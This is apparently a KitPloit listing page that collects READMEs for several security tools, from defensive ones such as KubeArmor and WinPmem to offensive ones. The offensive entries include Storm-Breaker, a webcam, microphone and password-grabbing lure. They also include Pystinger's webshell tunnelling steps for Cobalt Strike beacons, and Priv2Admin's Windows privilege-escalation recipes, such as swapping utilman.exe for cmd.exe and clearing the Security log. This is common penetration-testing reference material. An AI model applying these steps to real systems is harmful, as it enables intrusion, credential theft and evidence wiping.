Quantcast
Channel: KitPloit - PenTest Tools!
Viewing all 5816 articles
Browse latest View live

Nginxpwner - Tool to look for common Nginx misconfigurations and vulnerabilities

$
0
0


Nginxpwner is a simple tool to look for common Nginx misconfigurations and vulnerabilities.


Install:
cd /opt
git clone https://github.com/stark0de/nginxpwner
cd nginxpwner
chmod +x install.sh
./install.sh

Usage:
Target tab in Burp, select host, right click, copy all URLs in this host, copy to a file

cat urllist | unfurl paths | cut -d"/" -f2-3 | sort -u > /tmp/pathlist

Or get the list of paths you already discovered in the application in some other way. Note: the paths should not start with /

Finally:

python3 nginxpwner.py https://example.com /tmp/pathlist

Notes:

It actually checks for:

-Gets Ngnix version and gets its possible exploits using searchsploit and tells if it is outdated

-Throws a wordlist specific to Nginx via gobuster

-Checks if it is vulnerable to CRLF via a common misconfiguration of using $uri in redirects

-Checks for CRLF in all of the paths provided

-Checks if the PURGE HTTP method is available from the outside

-Checks for variable leakage misconfiguration

-Checks for path traversalvulnerabilities via merge_slashes set to off

-Tests for differences in the length of requests when using hop-by-hop headers (ex: X-Forwarded-Host)

-Uses Kyubi to test for path traversal vulnerabilities via misconfigured alias

-Tests for 401/403 bypass using X-Accel-Redirect

-Shows the payload to check for Raw backend reading response misconfiguration

-Checks if the site uses PHP and suggests some nginx-specific tests for PHP sites

-Tests for the common integer overflow vulnerability in Nginx's range filter module (CVE-2017-7529)

The tool uses the Server header in the response to do some of the tests. There are other CMS and so which are built on Nginx like Centminmod, OpenResty, Pantheon or Tengine for example which don't return that header. In that case please use nginx-pwner-no-server-header.py with the same parameters than the other script

Also, for the exploit search to run correctly you should do: searchsploit -u in Kali from time to time

The tool does not check for web cache poisoning/deception vulnerabilities nor request smuggling, you should test that with specific tools for those vulnerabilities. NginxPwner is mainly focused in misconfigurations developers may have introduced in the nginx.conf without being aware of them.

Credit to shibli2700 for his awesome tool Kyubi https://github.com/shibli2700/Kyubi and to all the contributors of gobuster. Credits also to Detectify (which actually discovered many of this misconfigurations in NGINX)




Storm-Breaker - Tool Social Engineering (Access Webcam, Microphone, OS Password Grabber And Location Finder) With Ngrok

$
0
0


Tool Social Engineering (Access Webcam, Microphone, OS Password Grabber And Location Finder) With Ngrok



Features:
  • Get Device Information Without Any Permissions
  • Access Location [SMARTPHONES]
  • Os Password Grabber [WIN-10]
  • Access Webcam
  • Access Microphone



Operating Systems Tested

Installation On Kali Linux
$ git clone https://github.com/ultrasecurity/Storm-Breaker
$ cd Storm-Breaker
$ sudo bash linux-installer.sh
$ python3 -m pip install -r requirments.txt
$ sudo python3 Storm-Breaker.py


WinPmem - The Multi-Platform Memory Acquisition Tool

$
0
0

The WinPmem memory acquisition driver and userspace

WinPmem has been the default open source memory acquisition driver for windows for a long time. It used to live in the Rekall project, but has recently been separated into its own repository.


Copyright

This code was originally developed within Google but was released under the Apache License.


Description

WinPmem is a physical memory acquisition tool with the following features:

  • Open source

  • Support for WinXP - Win 10, x86 + x64. The WDK7600 can be used to include WinXP support. As default, the provided WinPmem executables will be compiled with WDK10, supporting Win7 - Win10, and featuring more modern code.

  • Three different independent methods to create a memory dump. One method should always work even when faced with kernel mode rootkits.

  • Raw memory dump image support.

  • A read device interface is used instead of writing the image from the kernel like some other imagers. This allows us to have complex userspace imager (e.g. copy across network, hash etc), as well as run analysis on the live system (e.g. can be run directly on the device).

The files in this directory (Including the WinPmem sources and signed binaries), are available under the following license: Apache License, Version 2.0


How to use

There are two WinPmem executables: winpmem_mini_x86.exe and winpmem_mini_x64.exe. Both versions contain both drivers (32 and 64 bit versions).

The mini in the binary name refers to this imager being a plain simple imager - it can only produce images in RAW format. In the past we release a WinPmem imager based on AFF4 but that one is yet to be updated to the new driver. Please let us know if you need the AFF4 based imager.


The Python acquisition tool winpmem.py

The python program is currently under construction but works as a demonstration for how one can use the imager from Python.


winpmem_mini_x64.exe (standalone executable)

This program is easiest to use for incident response since it requires no other dependencies than the executable itself. The program will load the correct driver (32 bit or 64 bit) automatically and is self-contained.


Examples:

winpmem_mini_x64.exe physmem.raw

Writes a raw image to physmem.raw using the default method of acquisition.

winpmem_mini_x64.exe

Invokes the usage print / short manual.

To acquire a raw image using specifically the MmMapIoSpace method:

winpmem.exe -1 myimage.raw

The driver will be automatically unloaded after the image is acquired!


Experimental write support

The WinPmem source code supports writing to memory as well as reading. This capability is a great learning tool since many rootkit hiding techniques can be emulated by writing to memory directly.

This functionality should be used with extreme caution!

NOTE: Since this is a rather dangerous capability, the signed binary drivers have write support disabled. You can rebuild the drivers to produce test signed binaries if you want to use this feature. The unsigned binaries (really self signed with a test certificate) can not load on a regular system due to them being test self signed, but you can allow the unsigned drivers to be loaded on a test system by issuing (see https://docs.microsoft.com/en-us/windows-hardware/drivers/install/the-testsigning-boot-configuration-option:

Bcdedit.exe -set TESTSIGNING ON

and reboot. You will see a small "Test Mode" text on the desktop to remind you that this machine is configured for test signed drivers.

Additionally, Write support must also be enabled at load time:

winpmem.exe -w -l

This will load the drivers and turn on write support.


Acknowledgments

This project would also not be possible without support from the wider DFIR community:

  • We would like to thank Emre Tinaztepe and Mehmet GÖKSU at Binalyze.

Our open source contributors:

  • Viviane Zwanger
  • Mike Cohen


Duplicut - Remove Duplicates From MASSIVE Wordlist, Without Sorting It (For Dictionary-Based Password Cracking)

$
0
0


Quickly dedupe massive wordlists, without changing the order 

Created by nil0x42 and contributors

Overview

Modern password wordlist creation usually implies concatenating multiple data sources.

Ideally, most probable passwords should stand at start of the wordlist, so most common passwords are cracked instantly.

With existing dedupe tools you are forced to choose if you prefer to preserve the order OR handle massive wordlists.

Unfortunately, wordlist creation requires both:



So i wrote duplicut in highly optimized C to address this very specific need


Quick start

git clone https://github.com/nil0x42/duplicut
cd duplicut/ && make
./duplicut wordlist.txt -o clean-wordlist.txt

Options


 

  • Features:

    • Handle massive wordlists, even those whose size exceeds available RAM
    • Filter lines by max length (-l option)
    • Can remove lines containing non-printable ASCII chars (-p option)
    • Press any key to show program status at runtime.
  • Implementation:

    • Written in pure C code, designed to be fast
    • Compressed hashmap items on 64 bit platforms
    • Multithreading support
    • [TODO]: Use huge memory pages to increase performance
  • Limitations:

    • Any line longer than 255 chars is ignored
    • Heavily tested on Linux x64, mostly untested on other platforms.

Technical Details

1- Memory optimized:

An uint64 is enough to index lines in hashmap, by packing size info within pointer's extra bits:


2- Massive file handling:

If whole file can't fit in memory, it is split into Remove duplicates from MASSIVE wordlist, without sorting it (for dictionary-based password cracking) (8) virtual chunks, then each one is tested against next chunks.

So complexity is equal to Remove duplicates from MASSIVE wordlist, without sorting it (for dictionary-based password cracking) (9)th triangle number:



Throubleshotting

If you find a bug, or something doesn't work as expected, please compile duplicut in debug mode and post an issue with attached output:

# debug level can be from 1 to 4
make debug level=1
./duplicut [OPTIONS] 2>&1 | tee /tmp/duplicut-debug.log


Evasor - A Tool To Be Used In Post Exploitation Phase For Blue And Red Teams To Bypass APPLICATIONCONTROL Policies

$
0
0


The Evasor is an automated security assessment tool which locates existing executables on the Windows operating system that can be used to bypass any Application Control rules. It is very easy to use, quick, saves time and fully automated which generates for you a report including description, screenshots and mitigations suggestions, suites for both blue and red teams in the assessment of a post-exploitation phase.


Requirements
  • Windows OS.
  • Visual studio 2017 installed.

Usage instructions

Download the Evasor project and complie it. Verify to exclude from the project the App.config file from the reference tree.


 

run Evasor.exe from the bin folder. Choose your numeric option from the follwoing:



  1. Locating executable files that can be used to bypass the Application Control!
  • Retrieving the all running processes relative paths
  • Checking every process (executable file) if it vulnerable to DLL Injection by:
    1. Running “MavInject” Microsoft component from path C:\Windows\System32\mavinject.exe with default parameters.
    2. Checking the exit code of the MavInject execution, if the process exited normally it means that the process is vulnerable to DLL Injection and can be used to bypass the Application Control.
  1. Locating processes that vulnerable to DLL Hijacking!
  • Retrieving the all running processes
  • For each running Process:
    1. Retrieving the loaded process modules
    2. Checking if there is a permission to write data into the directory of the working process by creating an empty file with the name of the loaded module (DLL) or overwriting an existence module file on the working process directory.
    3. If the write operation succeeds – it seems that the process is vulnerable to DLL Hijacking.
  1. Locating for potential hijackable resource files
  • Searching for specific files on the computer by their extension.
  • Trying to replace that files to another place in order to validate that the file can be replaceable and finally, potentially vulnerable to Resource Hijacking.
  • Extensions: xml,config,json,bat,cmd,ps1,vbs,ini,js,exe,dll,msi,yaml,lib,inf,reg,log,htm,hta,sys,rsp
  1. Generating an automatic assessment report word document includes a description of tests and screenshots taken.

Contributing

We welcome contributions of all kinds to this repository. For instructions on how to get started and descriptions of our development workflows, please see our contributing guide.


Share Your Thoughts And Feedback

For more comments, suggestions or questions, you can contact Arik Kublanov from CyberArk Labs: Copyright © 2020 CyberArk Software Ltd. All rights reserved. Labs. You can find more projects developed by us in https://github.com/cyberark/.


Notes
  • The original code developed and being used on CyberArk Labs: Copyright © 2020 CyberArk Software Ltd. All rights reserved. internaly, makes full automation and exploitation of the informative results.
  • The original code contains part of activation and exploitation but we removed it from here. 
  • The files content under the DLLs folder are empty and not contains any exploitation code also and it's for the Cyber Security community Red and Blue teams to be used and to be implemented according to their own needs and can be a starting point for their assessment objectives. 


LibAFL - Advanced Fuzzing Library - Slot Your Fuzzer Together In Rust! Scales Across Cores And Machines. For Windows, Android, MacOS, Linux, No_Std, ...

$
0
0

Advanced Fuzzing Library - Slot your own fuzzers together and extend their features using Rust.

LibAFL is written and maintained by Andrea Fioraldi andreafioraldi@gmail.com and Dominik Maier mail@dmnk.co.


Why LibAFL?

LibAFL gives you many of the benefits of an off-the-shelf fuzzer, while being completely customizable. Some highlight features currently include:

  • fast: We do everything we can at compile time, keeping runtime overhead minimal. Users reach 120k execs/sec in frida-mode on a phone (using all cores).
  • scalable: Low Level Message Passing, LLMP for short, allows LibAFL to scale almost linearly over cores, and via TCP to multiple machines soon!
  • adaptable: You can replace each part of LibAFL. For example, BytesInput is just one potential form input: feel free to add an AST-based input for structured fuzzing, and more.
  • multi platform: LibAFL was confirmed to work on Windows, MacOS, Linux, and Android on x86_64 and aarch64. LibAFL can be built in no_std mode to inject LibAFL into obscure targets like embedded devices and hypervisors.
  • bring your own target: We support binary-only modes, like Frida-Mode, as well as multiple compilation passes for sourced-based instrumentation. Of course it's easy to add custom instrumentation backends.

Overview

LibAFL is a collection of reusable pieces of fuzzers, written in Rust. It is fast, multi-platform, no_std compatible, and scales over cores and machines.

It offers a main crate that provide building blocks for custom fuzzers, libafl, a library containing common code that can be used for targets instrumentation, libafl_targets, and a library providing facilities to wrap compilers, libafl_cc.

LibAFL offers integrations with popular instrumentation frameworks. At the moment, the supported backends are:


Getting started
  1. Install the Rust development language. We highly recommend not to use e.g. your Linux distribution package as this is likely outdated. So rather install Rust directly, instructions can be found here.

  2. Clone the LibAFL repository with

git clone https://github.com/AFLplusplus/LibAFL

If you want to get the latest and greatest features,

git checkout dev

Build the library using

cargo build --release
  1. Build the API documentation with
cargo doc
  1. Browse the LibAFL book (WIP!) with (requires mdbook)
cd docs && mdbook serve

We collect all example fuzzers in ./fuzzers. Be sure to read their documentation (and source), this is the natural way to get started!

The best-tested fuzzer is ./fuzzers/libfuzzer_libpng, a multicore libfuzzer-like fuzzer using LibAFL for a libpng harness.


Resources

Contributing

Check the TODO.md file for features that we plan to support.

For bugs, feel free to open issues or contact us directly. Thank you for your support. <3



Pystinger - Bypass Firewall For Traffic Forwarding Using Webshell

$
0
0

Pystinger implements SOCK4 proxy and port mapping through webshell.

It can be directly used by metasploit-framework, viper, cobalt strike for session online.

Pystinger is developed in python, and currently supports three proxy scripts: php, jsp(x) and aspx.


Usage

Suppose the domain name of the server is http://example.com :8080 The intranet IPAddress of the server intranet is 192.168.3.11


SOCK4 Proxy
  • proxy.jsp Upload to the target server and ensure that http://example.com:8080/proxy.jsp can access,the page returns UTF-8
  • stinger_server.exe Upload to the target server,AntSword run cmdstart D:/XXX/stinger_server.exeto start pystinger-server

Don't run D:/xxx/singer_server.exe directly,it will cause TCP disconnection

  • Run ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000 on your VPS
  • Your will see following output
root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 127.0.0 .1:60020
2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 127.0.0.1:60020
2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
  • Now you have started a socks4a proxy on VPS 127.0.0.1:60000 for intranet of example.com.
  • Now the target server(example.com) 127.0.0.1:60020 has been mapped to the VPS 127.0.0.1:60020

cobaltstrike`s beacon online for single target
  • proxy.jsp Upload to the target server and ensure that http://example.com:8080/proxy.jsp can access,the page returns UTF-8
  • stinger_server.exe Upload to the target server,AntSword run cmdstart D:/XXX/stinger_server.exeto start pystinger-server

Don't run D:/xxx/singer_server.exe directly,it will cause TCP disconnection

  • Run ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000 on your VPS
  • Your will see following output
root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 127.0.0 .1:60020
2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 127.0.0.1:60020
2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
  • Add listener on cobaltstrike,Listener port is 60020 (Handler/LISTEN port in RAT CONFIG of output ),listener address is 127.0.0.1
  • Generate payload,upload to the target and run.

cobaltstrike`s beacon online for multi targets
  • proxy.jsp Upload to the target server and ensure that http://example.com:8080/proxy.jsp can access,the page returns UTF-8
  • stinger_server.exe Upload to the target server,AntSword run cmdstart D:/XXX/stinger_server.exe 192.168.3.11to start pystinger-server (192.168.3.11 is intranet ipaddress of the target)

192.168.3.11 can change to 0.0.0.0

  • Run ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000 on your VPS
  • Your will see following output
root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 192.168 .3.11:60020
2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 192.168.3.11:60020
2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
  • Add listener on cobaltstrike,Listener port is 60020 (Handler/LISTEN port in RAT CONFIG of output ),listener address is 192.168.3.11
  • Generate payload,upload to the target and run.
  • When lateral movement to other hosts, you can point the payload to 192.168.3.11:60020 to make beacon online

Custom header and proxy
  • If the webshell needs to configure cookie or authorization, the request header can be configured through the -- header parameter --header "Authorization: XXXXXX,Cookie: XXXXX"

  • If the webshell needs to be accessed by proxy, you can set the proxy through -- proxy --proxy "socks5:127.0.0.1:1081"


Related tools

https://github.com/nccgroup/ABPTTS

https://github.com/sensepost/reGeorg

https://github.com/SECFORCE/Tunna


Tested

stinger_server\stinger_client
  • windows
  • linux

proxy.jsp(x)/php/aspx
  • php7.2
  • tomcat7.0
  • iis8.0

Update log

2.0 Update time: 2019-09-29

  • Socks4 proxy service moves to client

2.1 Update time: 2020-01-07



Botkube - An App That Helps You Monitor Your Kubernetes Cluster, Debug Critical Deployments &Amp; Gives Recommendations For Standard Practices

$
0
0

For complete documentation visit www.botkube.io

BotKube integration with Slack, Mattermost or Microsoft Teams helps you monitor your Kubernetes cluster, debug critical deployments and gives recommendations for standard practices by running checks on the Kubernetes resources. You can also ask BotKube to execute kubectl commands on k8s cluster which helps debugging an application or cluster.


Hacktoberfest 2020

BotKube is participating in Hacktoberfest 2020. We are giving some really cool swags to our contributors, learn more at - https://www.infracloud.io/blogs/infracloud-joins-hacktoberfest-2020/.


Getting started

Please follow this for a complete BotKube installation guide.


Architecture



  • Informer Controller: Registers informers to kube-apiserver to watch events on the configured k8s resources. It forwards the incoming k8s event to the Event Manager.
  • Event Manager: Extracts required fields from k8s event object and creates a new BotKube event struct. It passes BotKube event struct to the Filter Engine.
  • Filter Engine: Takes the k8s object and BotKube event struct and runs Filters on them. Each filter runs some validations on the k8s object and modifies the messages in the BotKube event struct if required.
  • Event Notifier: Finally, notifier sends BotKube event over the configured communication channel.
  • Bot Interface: Bot interface takes care of authenticating and managing connections with communication mediums like Slack, Mattermost, Microsoft Teams and reads/sends messages from/to them.
  • Executor: Executes BotKube or kubectl command and sends back the result to the Bot interface.

Visit www.botkube.io for Configuration, Usage and Examples.




KubeArmor - Container-aware Runtime Security Enforcement System

$
0
0


Introduction to KubeArmor

KubeArmor is a container-aware runtime security enforcement system that restricts the behavior (such as process execution, file access, networking operation, and resource utilization) of containers at the system level.

KubeArmor operates with Linux security modules (LSMs), meaning that it can work on top of any Linux platforms (such as Alpine, Ubuntu, and Container-optimized OS from Google) if Linux security modules (e.g., AppArmor, SELinux, or KRSI) are enabled in the Linux Kernel. KubeArmor will use the appropriate LSMs to enforce the required policies.


KubeArmor is designed for Kubernetes environments; thus, operators only need to define security policies and apply them to Kubernetes. Then, KubeArmor will automatically detect the changes in security policies from Kubernetes and enforce them to the corresponding containers without any human intervention.

If there are any violations against security policies, KubeArmor immediately generates audit logs with container identities. If operators have any logging systems, it automatically sends audit logs to their systems as well.



Functionality Overview
  • Restrict the behavior of containers at the system level

Traditional container security solutions (e.g., Cilium) mostly protect containers by determining their inter-container relations (i.e., service flows) at the network level. In contrast, KubeArmor prevents malicious or unknown behaviors in containers by specifying their desired actions (e.g., a specific process should only be allowed to access a sensitive file).

For this, KubeArmor provides the ability to filter process executions, file accesses, resource utilization, and even network operations inside containers at the system level.

  • Enforce security policies to containers in runtime

In general, security policies (e.g., Seccomp and AppArmor profiles) are statically defined within pod definitions for Kubernetes, and they are applied to containers at creation time. Then, the security policies are not allowed to be updated in runtime.

To avoid this problem, KubeArmor maintains security policies separately, which means that security policies are no longer tightly coupled with containers. Then, KubeArmor directly applies the security policies into Linux security modules (LSMs) for each container according to the labels of given containers and security policies.

  • Produce container-aware audit logs

LSMs do not have any container-related information; thus, they generate audit logs only based on system metadata (e.g., User ID, Group ID, and process ID). Therefore, it is hard to figure out what containers cause policy violations.

To address this problem, KubeArmor uses an eBPF-based system monitor, which keeps track of process life cycles in containers, and converts system metadata to container identities when LSMs generate audit logs for any policy violations from containers.

  • Provide easy-to-use semantics for policy definitions

KubeArmor provides the ability to monitor the life cycles of containers' processes and take policy decisions based on them. In general, it is much easier to deny a specific action but it is more difficult to allow only specific actions while denying all. KubeArmor manages internal complexities associated with handling such policy decisions and provides easy semantics towards policy language.

  • Support network security enforcement among containers

KubeArmor aims to protect containers themselves rather than interactions among containers. However, using KubeArmor a user can add policies that could apply policy settings at the level of network system calls (e.g., bind(), listen(), accept(), and connect()), thus somewhat controlling interactions among containers.


Getting Started

Please take a look at the following documents.

  1. Deployment Guide
  2. Security Policy Specification for Containers
  3. Security Policy Examples for Containers
  4. Security Policy Specification for Nodes (Hosts)
  5. Security Policy Examples for Nodes (Hosts)

If you want to make a contribution, please refer to the following documents too.

  1. Contribution Guide
  2. Development Guide
  3. Technical Roadmap

Community
  • Slack

    Please join the KubeArmor Slack channel to communicate with KubeArmor developers and other users. We always welcome having a discussion about the problems that you face during the use of KubeArmor.



Priv2Admin - Exploitation Paths Allowing You To (Mis)Use The Windows Privileges To Elevate Your Rights Within The OS

$
0
0


The idea is to "translate" Windows OS privileges to a path leading to:

  1. administrator,
  2. integrity and/or confidentiality threat,
  3. availability threat,
  4. just a mess.

Privileges are listed and explained at: https://docs.microsoft.com/en-us/windows/win32/secauthz/privilege-constants


If the goal can be achieved multiple ways, the priority is

  1. Using built-in commands
  2. Using PowerShell (only if a working script exists)
  3. Using non-OS tools
  4. Using any other method

You can check your own privileges with whoami /priv. Disabled privileges are as good as enabled ones. The only important thing is if you have the privilege on the list or not.

Note 1: Whenever the attack path ends with a token creation, you can assume the next step is to create new process using such token and then take control over OS.

Note 2:
a. For calling NtQuerySystemInformation()/ZwQuerySystemInformation() directly, you can find required privileges here.
b. For NtSetSystemInformation()/ZwSetSystemInformation() required privileges are listed here here.

Note 3: I am focusing on the OS only. If a privilege works in AD but not in the OS itself, I am describing it as not used in the OS. It would be nice if someone digs deeper into AD-oriented scenarios.

Feel free to contribute and/or discuss presented ideas.

PrivilegeImpactToolExecution pathRemarks
SeAssignPrimaryTokenAdmin3rd party tool"It would allow a user to impersonate tokens and privesc to nt system using tools such as potato.exe, rottenpotato.exe and juicypotato.exe"Thank you Aurélien Chalot for the update. I will try to re-phrase it to something more recipe-like soon.
SeAuditThreat3rd party toolWrite events to the Security event log to fool auditing or to overwrite old events.Writing own events is possible with Authz Report Security Event API.
SeBackupAdmin3rd party tool1. Backup the HKLM\SAM and HKLM\SYSTEM registry hives
2. Extract the local accounts hashes from the SAM database
3. Pass-the-Hash as a member of the local Administrators group

Alternatively, can be used to read sensitive files.
For more information, refer to the SeBackupPrivilege file.
SeChangeNotifyNone--Privilege held by everyone. Revoking it may make the OS (Windows Server 2019) unbootable.
SeCreateGlobal???
SeCreatePagefileNoneBuilt-in commandsCreate hiberfil.sys, read it offline, look for sensitive data.Requires offline access, which leads to admin rights anyway.
SeCreatePermanent???
SeCreateSymbolicLink???
SeCreateTokenAdmin3rd party toolCreate arbitrary token including local admin rights with NtCreateToken.
SeDebugAdminPowerShellDuplicate the lsass.exe token.Script to be found at FuzzySecurity
SeDelegateSession-
UserImpersonate
???Privilege name broken to make the column narrow.
SeEnableDelegationNone--The privilege is not used in the Windows OS.
SeImpersonateAdmin3rd party toolTools from the Potato family (potato.exe, rottenpotato.exe and juicypotato.exe), RogueWinRM, etc.Similarly to SeAssignPrimaryToken, allows by design to create a process under the security context of another user (using a handle to a token of said user).

Multiple tools and techniques may be used to obtain the required token.
SeIncreaseBasePriorityAvailabilityBuilt-in commandsstart /realtime SomeCpuIntensiveApp.exeMay be more interesting on servers.
SeIncreaseQuotaAvailability3rd party toolChange cpu, memory, and cache limits to some values making the OS unbootable.- Quotas are not checked in the safe mode, which makes repair relatively easy.
- The same privilege is used for managing registry quotas.
SeIncreaseWorkingSetNone--Privilege held by everyone. Checked when calling fine-tuning memory management functions.
SeLoadDriverAdmin3rd party tool1. Load buggy kernel driver such as szkg64.sys
2. Exploit the driver vulnerability

Alternatively, the privilege may be used to unload security-related drivers with ftlMC builtin command. i.e.: fltMC sysmondrv
1. The szkg64vulnerability is listed as CVE-2018-15732
2. The szkg64exploit code was created by Parvez Anwar
SeLockMemoryAvailability3rd party toolStarve System memory partition by moving pages.PoC published by Walied Assar (@waleedassar)
SeMachineAccountNone--The privilege is not used in the Windows OS.
SeManageVolumeAdmin3rd party tool1. Enable the privilege in the token
2. Create handle to \.\C: with SYNCHRONIZE | FILE_TRAVERSE
3. Send the FSCTL_SD_GLOBAL_CHANGE to replace S-1-5-32-544 with S-1-5-32-545
4. Overwrite utilman.exe etc.
FSCTL_SD_GLOBAL_CHANGE can be made with this piece of code.
SeProfileSingleProcessNone--The privilege is checked before changing (and in very limited set of commands, before querying) parameters of Prefetch, SuperFetch, and ReadyBoost. The impact may be adjusted, as the real effect is not known.
SeRelabelThreat3rd party toolModification of system files by a legitimate administrator?See: MIC documentation

Integrity labels are infrequently used and work only on top of standard ACLs. Two main scenarios include:
- protection against attacks using exploitable applications such as browsers, PDF readers etc.
- protection of OS files.

Attacks with SeRelabel must obey access rules defined by ACLs, which makes them significantly less useful in practice.
SeRemoteShutdownAvailabilityBuilt-in commandsshutdown /s /f /m \\server1 /d P:5:19The privilege is verified when shutdown/restart request comes from the network. 127.0.0.1 scenario to be investigated.
SeReserveProcessorNone--It looks like the privilege is no longer used and it appeared only in a couple of versions of winnt.h. You can see it listed i.e. in the source code published by Microsoft here.
SeRestoreAdminPowerShell1. Launch PowerShell/ISE with the SeRestore privilege present.
2. Enable the privilege with Enable-SeRestorePrivilege).
3. Rename utilman.exe to utilman.old
4. Rename cmd.exe to utilman.exe
5. Lock the console and press Win+U
Attack may be detected by some AV software.

Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege.
SeSecurityThreatBuilt-in commands- Clear Security event log: wevtutil cl Security

- Shrink the Security log to 20MB to make events flushed soon: wevtutil sl Security /ms:0

- Read Security event log to have knowledge about processes, access and actions of other users within the system.

- Knowing what is logged to act under the radar.

- Knowing what is logged to generate large number of events effectively purging old ones without leaving obvious evidence of cleaning.
SeShutdownAvailabilityBuilt-in commandsshutdown.exe /s /f /t 1Allows to call most of NtPowerInformation() levels. To be investigated.
SeSyncAgentNone--The privilege is not used in the Windows OS.
SeSystemEnvironmentUnknown3rd party toolThe privilege permits to use NtSetSystemEnvironmentValue, NtModifyDriverEntry and some other syscalls to manipulate UEFI variables.- Firmware environment variables were commonly used on non-Intel platforms in the past, and now slowly return to UEFI world.
- The area is highly undocumented.
- The potential may be huge (i.e. breaking Secure Boot) but raising the impact level requires at least PoC.
SeSystemProfile???
SeSystemtimeThreatBuilt-in commandscmd.exe /c date 01-01-01
cmd.exe /c time 00:00
The privilege allows to change the system time, potentially leading to audit trail integrity issues, as events will be stored with wrong date/time.
- Be careful with date/time formats. Use always-safe values if not sure.
